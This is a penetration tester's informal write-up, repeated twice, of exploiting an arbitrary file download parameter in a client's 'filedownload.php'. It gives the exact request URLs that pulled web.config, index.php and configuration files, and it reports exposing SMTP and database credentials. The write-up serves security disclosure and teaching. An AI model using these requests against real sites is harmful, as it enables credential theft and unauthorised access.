On May 2nd I started a revaluation of web application for a client. While doing revaluation I found out that they have added some more functions in web app, I started exploring the new features of app every things look fine as they where all static HTML page then suddenly I came across a file "filedownload.php".
Now, my first step was to spider this branch that I did with help of burp suite & the full link was "http://site.com/filedownload.php?file=E:\netpub\vhosts\www\httpdocs/journal/welcome.pdf"
The Path Of Application was disclosed : E:\netpub\vhosts\www\
Then, I simply run the link "http://site.com/filedownload.php?file=" on my browser & I Received a error message from server that :
"ERROR: download file NOT SPECIFIED. USE forcedownload.php?file=filepath"
The moment I saw that error I remember it may be old school GHDB type file download vulnerability so, now I have to check for two type of Vulnerability :
1. LFI - Local File Inclusion
2. Source Code Disclosure
So after doing some Directory Traversal attacks I was sure that LFI was not applicable.
Then I started looking for Web.Config File as the server was working on Windows IIS.
"http://site.com/filedownload.php?file=web.config" the link works but no luck as the file was empty.
Then I, Looked for "index.php" file as many web developers sets there database connection password in "index" file "http://site.com/filedownload.php?file=index.php". Luckily I was able to download the index file but still the password was not present.
But, I get a hint a file name "UserUtils.php" was linked to the "index.php" file.
So, I started searching for "UserUtils.php" in all available paths I knew. After some hard work I located file inside "E:\netpub\vhosts\www\htdocs\UserUtils.php" Full Link :
"http://site.com/filedownload.php?file=E:\netpub\vhosts\www\htdocs\UserUtils.php"
& file contains SMTP Server's Administrator Email ID , UserName , Password etc...
But Sill I was not done, I have to find the Database Credentials so, After reading the whole file I found a New Path which have configuration file "admin/include/config.php" & "admin/include/functions.php"
Now, I tried to download Configuration file "http://site.com/filedownload.php?file=admin/include/config.php"
& Cheers I was able to see the Database Credentials as they were in plaintext.
Similar Type Of Attack Video Tutorial : https://www.youtube.com/watch?v=gjREfF5C4RQ
Thanks,
-Raghav Bisht
Now, my first step was to spider this branch that I did with help of burp suite & the full link was "http://site.com/filedownload.php?file=E:\netpub\vhosts\www\httpdocs/journal/welcome.pdf"
The Path Of Application was disclosed : E:\netpub\vhosts\www\
Then, I simply run the link "http://site.com/filedownload.php?file=" on my browser & I Received a error message from server that :
"ERROR: download file NOT SPECIFIED. USE forcedownload.php?file=filepath"
The moment I saw that error I remember it may be old school GHDB type file download vulnerability so, now I have to check for two type of Vulnerability :
1. LFI - Local File Inclusion
2. Source Code Disclosure
So after doing some Directory Traversal attacks I was sure that LFI was not applicable.
Then I started looking for Web.Config File as the server was working on Windows IIS.
"http://site.com/filedownload.php?file=web.config" the link works but no luck as the file was empty.
Then I, Looked for "index.php" file as many web developers sets there database connection password in "index" file "http://site.com/filedownload.php?file=index.php". Luckily I was able to download the index file but still the password was not present.
But, I get a hint a file name "UserUtils.php" was linked to the "index.php" file.
So, I started searching for "UserUtils.php" in all available paths I knew. After some hard work I located file inside "E:\netpub\vhosts\www\htdocs\UserUtils.php" Full Link :
"http://site.com/filedownload.php?file=E:\netpub\vhosts\www\htdocs\UserUtils.php"
& file contains SMTP Server's Administrator Email ID , UserName , Password etc...
But Sill I was not done, I have to find the Database Credentials so, After reading the whole file I found a New Path which have configuration file "admin/include/config.php" & "admin/include/functions.php"
Now, I tried to download Configuration file "http://site.com/filedownload.php?file=admin/include/config.php"
& Cheers I was able to see the Database Credentials as they were in plaintext.
Similar Type Of Attack Video Tutorial : https://www.youtube.com/watch?v=gjREfF5C4RQ
Thanks,
-Raghav Bisht